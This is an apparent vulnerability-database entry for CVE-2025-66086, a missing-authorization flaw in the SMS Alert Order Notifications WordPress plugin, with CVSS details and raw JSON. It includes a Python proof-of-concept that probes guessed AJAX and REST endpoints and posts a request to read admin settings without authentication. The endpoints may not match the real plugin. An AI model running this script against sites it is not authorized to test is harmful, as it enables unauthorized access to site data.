Security Vulnerability Report
中文
CVE-2025-66086 CVSS 5.3 MEDIUM

CVE-2025-66086

Published: 2025-11-21 13:15:50
Last Modified: 2026-04-27 18:16:35

Description

Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Alert Order Notifications: from n/a through <= 3.8.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SMS Alert Order Notifications <= 3.8.8
Cozy Vision SMS Alert WordPress插件 全部历史版本至3.8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66086 PoC - Missing Authorization in SMS Alert Plugin # Target: WordPress site with SMS Alert plugin <= 3.8.8 import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-66086 """ # Try to access SMS Alert admin functionality without authentication vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=smsalert_order_notification_settings', '/wp-admin/admin-ajax.php?action=smsalert_get_order_details', '/wp-json/sms-alert/v1/settings', '/wp-json/sms-alert/v1/orders' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10) # If we get a 200 response with data instead of 401/403, vulnerability exists if response.status_code == 200 and 'smsalert' in response.text.lower(): print(f'[+] VULNERABLE: {url}') print(f'[+] Response snippet: {response.text[:200]}') return True elif response.status_code == 200: print(f'[*] Potential issue at: {url}') except requests.RequestException as e: print(f'[-] Error checking {url}: {e}') print('[-] No obvious vulnerability detected') return False def exploit_access_control(target_url): """ Attempt to access sensitive SMS Alert data without authentication """ # Exploit endpoint for order notifications exploit_data = { 'action': 'smsalert_ajax', 'route': 'get_notification_settings', 'mod': 'phoneorders' } url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' try: response = requests.post(url, data=exploit_data, timeout=10) if response.status_code == 200: print('[+] Successfully accessed admin functionality without auth!') print(f'[+] Response: {response.text}') except requests.RequestException as e: print(f'[-] Exploit failed: {e}') if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] print(f'[*] Scanning {target} for CVE-2025-66086...') check_vulnerability(target) else: print('Usage: python cve-2025-66086.py <target_url>')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66086", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:49.760", "lastModified": "2026-04-27T18:16:34.670", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SMS Alert Order Notifications: from n/a through <= 3.8.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sms-alert/vulnerability/wordpress-sms-alert-order-notifications-plugin-3-8-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}